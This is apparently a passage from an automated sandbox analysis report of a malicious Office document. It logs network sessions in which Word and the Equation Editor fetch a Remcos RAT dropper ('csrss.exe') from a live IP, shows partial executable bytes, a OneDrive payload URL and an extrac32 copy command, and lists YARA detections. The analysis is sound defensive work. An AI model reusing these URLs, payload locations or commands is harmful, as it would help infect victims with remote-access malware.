May 23, 2024 20:20:55.995611906 CEST	743	IN	HTTP/1.1 405 Not Allowed Date: Thu, 23 May 2024 18:20:55 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BKVfh6yQhS0l%2FR2XP33OwzJmELuG2e3GPaFVBeG9794ZQwHN6UXPK5b2lP7kPpdxHgA%2FOcdJbCwJX0YNYSeCtkao5lJmjg3belkgDjlzpf%2FfwsdNevGro%2FhdFVM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888710114e65184d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0
May 23, 2024 20:20:56.004744053 CEST	153	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: qr-in.com Content-Length: 0 Connection: Keep-Alive Cookie: short_4348=1
May 23, 2024 20:20:56.152142048 CEST	737	IN	HTTP/1.1 405 Not Allowed Date: Thu, 23 May 2024 18:20:56 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c%2BVVRPZTOClkDAfgGW40FOjS6puE35ciKgdlTn3kC30aIoSBdiHUOo1ZNxTp0pUHSMD1n5m60igouW0KRYfqP7PGfXTmLv7DXRYqMG4Ka6MCOMPmIoUi5OFKIFs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888710126fd0184d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0
May 23, 2024 20:21:01.834717035 CEST	158	OUT	HEAD /NAvSGzZ HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: qr-in.com Content-Length: 0 Connection: Keep-Alive Cookie: short_4348=1
May 23, 2024 20:21:02.435961962 CEST	1030	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 23 May 2024 18:21:02 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Set-Cookie: PHPSESSID=7si5jotrg5ah6f6mdt5lvghp91; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Robots-Tag: noindex location: http://94.156.67.72/xampp/hgnn/hgn/lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions.doc X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y%2FEGasLnpJnkuSosbn3EaMjSSWZJLIKxsnYEtFqHIbl6AvQVPUwHXXt2RDf9%2FGxhRkvfkun%2B838BPpOCx1c3m3FOechtagIXrFjtcfSKHR%2BjWES%2B%2BiAp9xUOlDk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88871036ddf8184d-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49165	188.114.96.3	80	3460	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:20:56.359205961 CEST	139	OUT	HEAD /NAvSGzZ HTTP/1.1 Connection: Keep-Alive Cookie: short_4348=1 User-Agent: Microsoft Office Existence Discovery Host: qr-in.com
May 23, 2024 20:20:57.306442976 CEST	1028	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 23 May 2024 18:20:57 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Set-Cookie: PHPSESSID=f45es590en3dlnsssqiu87c7nm; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Robots-Tag: noindex location: http://94.156.67.72/xampp/hgnn/hgn/lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions.doc X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1qVQ6i11GQg3b2kdL8Ub7vYE%2F4GaI%2BRTPffsPZrsR2HDA0C0NthbzpQm1DmsapJEZ%2FVPmyym%2BOLdEJL4lzpWsJULQpetfEpfuOFMxcBPcyIGaNicKbFgLoi%2Fcvs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88871016eb3c7c90-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.22	49166	94.156.67.72	80	3460	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:20:57.329024076 CEST	283	OUT	HEAD /xampp/hgnn/hgn/lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions.doc HTTP/1.1 Connection: Keep-Alive Cookie: short_4348=1 User-Agent: Microsoft Office Existence Discovery Host: 94.156.67.72
May 23, 2024 20:20:57.982094049 CEST	321	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 18:20:57 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Thu, 23 May 2024 07:10:38 GMT ETag: "913a-61919bf834b98" Accept-Ranges: bytes Content-Length: 37178 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword
May 23, 2024 20:20:58.200534105 CEST	321	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 18:20:57 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Thu, 23 May 2024 07:10:38 GMT ETag: "913a-61919bf834b98" Accept-Ranges: bytes Content-Length: 37178 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.22	49167	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:21:01.174150944 CEST	148	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive Cookie: short_4348=1 User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: qr-in.com
May 23, 2024 20:21:01.754220009 CEST	737	IN	HTTP/1.1 405 Not Allowed Date: Thu, 23 May 2024 18:21:01 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YSx4XsyZqF5jzRe2OfN2nQsKpjTGqrDF9QU5qfJktdNbjrOr6iZliW5QQgyqe2qAbvsRjC21LtLjL2e8VSYCcLvl7H%2BlfHyeAWblrNuQcRbgIuNgavHIEgfRuyk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8887103538de42c7-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.22	49168	94.156.67.72	80	3460	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:21:02.449398041 CEST	280	OUT	HEAD /xampp/hgnn/hgn/lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions.doc HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Content-Length: 0 Connection: Keep-Alive Host: 94.156.67.72
May 23, 2024 20:21:03.089210987 CEST	321	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 18:21:02 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Thu, 23 May 2024 07:10:38 GMT ETag: "913a-61919bf834b98" Accept-Ranges: bytes Content-Length: 37178 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.22	49169	94.156.67.72	80	3668	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:21:04.512393951 CEST	313	OUT	GET /4020/csrss.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 94.156.67.72 Connection: Keep-Alive
May 23, 2024 20:21:05.206437111 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 18:21:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Thu, 23 May 2024 07:42:57 GMT ETag: "153000-6191a33203e60" Accept-Ranges: bytes Content-Length: 1388544 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/lnk Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 d4 05 00 00 58 0f 00 00 00 00 00 28 ec 05 00 00 10 00 00 00 f0 05 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 [TRUNCATED] Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*X(@@@@%kF.text `.itextp<> `.dataP@.bss6.idata@%@&@.tls4p.rdata@@.relockl@B.rsrct@@0@@
May 23, 2024 20:21:05.206705093 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @Boolean@FalseTrue@,@Char@@IntegerX@Bytel@Word@Car
May 23, 2024 20:21:05.206844091 CEST	1236	IN	Data Raw: 7a 08 df 3a c3 90 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df 68 28 8b 48 30 89 4a 30 df 7a 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 8d 40 00 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df 68 28 df 68 30 8b 48 38 89 4a 38 df 7a 30 df 7a 28 Data Ascii: z:(hhhh h(H0J0z(z zzz:@(hhhh h(h0H8J8z0z(z zzz:(hhhh h(h0h8H@J@z8z0z(z zzz:@y,l\|<x,<DD@,<xH9Jt
May 23, 2024 20:21:05.206856012 CEST	1236	IN	Data Raw: 1c 07 53 00 39 cf 72 26 8b 35 18 07 53 00 0f b7 4b 1a 8d 91 30 0b 00 00 39 d7 72 02 89 cf 29 fe 29 3d 1c 07 53 00 89 35 18 07 53 00 eb 21 0f b7 43 1a 89 c7 e8 e5 fc ff ff 89 c6 85 c0 75 10 a2 14 07 53 00 88 03 5f 5e 5b c3 80 64 37 fc f7 8d 4f 06 Data Ascii: S9r&5SK09r))=S5S!CuS_^[d7ON1SFFsF KS){p_^[%St?jv%St)j`=,0u#$S
May 23, 2024 20:21:05.207298040 CEST	1236	IN	Data Raw: b8 00 01 00 00 f0 0f b0 25 14 07 53 00 74 0b 51 6a 0a e8 2b f5 ff ff 59 eb ce bb 0f 00 00 00 23 5e fc 09 eb 89 5e fc 89 cb 8b 57 fc f6 c2 01 75 09 83 ca 08 89 57 fc eb 17 90 89 f8 83 e2 f0 01 d3 01 d7 81 fa 30 0b 00 00 72 05 e8 ee f6 ff ff 89 5f Data Ascii: %StQj+Y#^^WuW0r_CD.0r.S]_^[to]_^[G,9=IStO%St'QRjfZY%StQRjL
May 23, 2024 20:21:05.207313061 CEST	1236	IN	Data Raw: 81 78 f4 00 10 00 00 75 1b 8b 45 08 f6 40 f8 e6 74 12 8b 45 08 f6 40 f9 01 75 09 8b c3 83 c0 b4 3b 18 74 04 33 c0 eb 02 b0 01 84 c0 74 25 83 c3 dc 8b 1b 85 db 74 1a 8b 45 08 50 8d 56 01 8b c3 83 e8 b4 e8 5a ff ff ff 59 84 c0 75 04 33 c0 eb 02 b0 Data Ascii: xuE@tE@u;t3t%tEPVZYu3^[]@US3ErU3(Yu3[]=ISt4 j'S34tj'S3u='Sujhhj{'S='S
May 23, 2024 20:21:05.207323074 CEST	776	IN	Data Raw: c6 03 0d 43 c6 03 0a 43 8b 85 e8 47 fe ff 40 8b d3 e8 84 f9 ff ff 8b d8 c6 03 20 43 c6 03 2d 43 c6 03 20 43 8b d3 8b 85 e4 47 fe ff e8 69 f9 ff ff 8b d8 b8 bc 29 40 00 b9 08 00 00 00 8b d3 e8 72 fa ff ff 8b d8 c6 85 f6 47 fe ff 01 eb 08 c6 03 2c Data Ascii: CCG@ C-C CGi)@rG,C Crt*)@C9)@.$F CxC COGGGG
May 23, 2024 20:21:05.207356930 CEST	1236	IN	Data Raw: c0 30 3d 30 0b 00 00 73 05 b8 30 0b 00 00 05 d0 04 00 00 c1 e8 0d 83 f8 07 76 05 b8 07 00 00 00 8b c8 b2 ff d2 e2 88 53 e5 c1 e0 0d 66 05 30 0b 66 89 43 fc 0f b7 7b e6 0f b7 c7 8b c8 c1 e1 04 8d 0c 49 81 c1 ef 00 00 00 81 e1 00 ff ff ff 83 c1 30 Data Ascii: 0=0s0vSf0fC{I00ss0s0v0 3fff%f0fC N0SSSSS@Nu'S'S'S'S_^[@SVWUS'S{
May 23, 2024 20:21:05.207369089 CEST	1236	IN	Data Raw: e3 ff ff 85 c0 74 0b 8b 04 24 a3 08 f0 45 00 59 5a c3 e8 6b e3 ff ff a3 08 f0 45 00 59 5a c3 8d 40 00 53 31 db 69 93 08 f0 45 00 05 84 08 08 42 89 93 08 f0 45 00 f7 e2 89 d0 5b c3 8b c0 66 a3 24 f0 45 00 db e2 d9 2d 24 f0 45 00 c3 90 6a 00 d9 3c Data Ascii: t$EYZkEYZ@S1iEBE[f$E-$Ej<$X<$XZ=(St(SSHftIfs3=St=Su3gt[@P@SV3Cf=r/f=w)f%f=u
May 23, 2024 20:21:05.208509922 CEST	1236	IN	Data Raw: 00 00 00 24 f4 12 40 00 00 00 00 00 80 96 98 16 40 00 00 00 00 00 20 bc be 19 40 00 00 00 00 00 28 6b ee 1c 40 00 00 00 00 00 f9 02 95 20 40 00 00 00 00 40 b7 43 ba 23 40 00 00 00 00 10 a5 d4 e8 26 40 00 00 00 00 2a e7 84 91 2a 40 00 00 00 80 f4 Data Ascii: $@@ @(k@ @@C#@&@**@ -@1_0@4@.7@@v:k:@#>@bxA@z&D@n2xH@W?hK@N@@aQYR@oU@: 'X@x9?\@6_@Ng
May 23, 2024 20:21:05.220832109 CEST	1236	IN	Data Raw: 40 00 55 8b ec 83 c4 f8 53 56 57 33 db 89 5d f8 8b f1 89 55 fc 8b f8 33 c0 55 68 c0 39 40 00 64 ff 30 64 89 20 33 c0 89 06 8b 55 fc 8b 07 e8 63 00 00 00 8b d8 85 db 74 31 8b 43 14 85 c0 74 13 03 f8 89 3e 83 3e 00 74 21 8b 06 50 8b 00 ff 50 04 eb Data Ascii: @USVW3]U3Uh9@d0d 3Uct1Ct>>t!PPMSrU%>3ZYYdh9@E$?_^[YY]SVCt)2;0ur;pur;pur;ptIu[t1^[SVtuu3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.22	49174	178.237.33.50	80	3832	C:\Users\user\AppData\Roaming\csrss.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:21:14.385339975 CEST	71	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
May 23, 2024 20:21:15.016427994 CEST	1171	IN	HTTP/1.1 200 OK date: Thu, 23 May 2024 18:21:14 GMT server: Apache content-length: 963 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED] Data Ascii: { "geoplugin_request":"8.46.123.175", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49171	13.107.137.11	443	3832	C:\Users\user\AppData\Roaming\csrss.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 18:21:09 UTC	213	OUT	GET /download?resid=77E389B66C951B09%21132&authkey=!AD_QXcfalkvUogo HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: onedrive.live.com
2024-05-23 18:21:09 UTC	1177	IN	HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: -1 Location: https://f3rtrw.bl.files.1drv.com/y4mAd3mcZPGImnMlQzVaLUaRGLF5rJ6dTRnmjMGEyxD33cnd2H9ImAFk6GH06rI3KMck3E5QUfcOZPhU0B_mNBna_nyngKFXWZTgNv1Ad3jtIplPy67HUT-H_QI_UQ9DMwQ1Mw40Qfz7bufwo4viHXiyRAZxjv_qhPoUnTrLgVmg_gVla9MxR1noVOE8U1BgeDUf4MHErdqC2SHkPpnmgC_fA/233_Efftwcmkvbf?download&psid=1 Set-Cookie: E=P:h9d+HlV73Ig=:VBd55ev/Q/M2EpbBJQ6HFt/TZL/Otwd47B3y8fOsfbY=:F; domain=.live.com; path=/ Set-Cookie: xid=3cfaba30-6c25-4c90-921b-7e95e541cb81&&ODSP-ODWEB-ODCF&183; domain=.live.com; path=/ Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Thu, 23-May-2024 16:41:09 GMT; path=/ Set-Cookie: wla42=; domain=live.com; expires=Thu, 30-May-2024 18:21:09 GMT; path=/ X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-MSNServer: 7dfffcfdb8-4ngz8 X-ODWebServer: nameastus2708987-odwebpl X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: 6A76E8B8CFC54ED199F035F056A3835A Ref B: BN3EDGE0321 Ref C: 2024-05-23T18:21:09Z Date: Thu, 23 May 2024 18:21:09 GMT Connection: close Content-Length: 0

Target ID:	0
Start time:	14:20:30
Start date:	23/05/2024
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f510000
File size:	28'253'536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	14:20:52
Start date:	23/05/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Imagebase:	0x13f6d0000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:21:02
Start date:	23/05/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:21:06
Start date:	23/05/2024
Path:	C:\Users\user\AppData\Roaming\csrss.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\csrss.exe"
Imagebase:	0x400000
File size:	1'388'544 bytes
MD5 hash:	913C99449A29C2640D36B0D5FDF69289
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.1012207860.0000000033DAB000.00000040.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.1007133666.000000000077F000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 21%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	14:21:11
Start date:	23/05/2024
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\csrss.exe C:\\Users\\Public\\Libraries\\Efftwcmk.PIF
Imagebase:	0x650000
File size:	53'248 bytes
MD5 hash:	4D306ED01994EDF577B98FD59BF269C0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	14:21:24
Start date:	23/05/2024
Path:	C:\Users\Public\Libraries\Efftwcmk.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Efftwcmk.PIF"
Imagebase:	0x400000
File size:	1'388'544 bytes
MD5 hash:	913C99449A29C2640D36B0D5FDF69289
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.463489236.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, 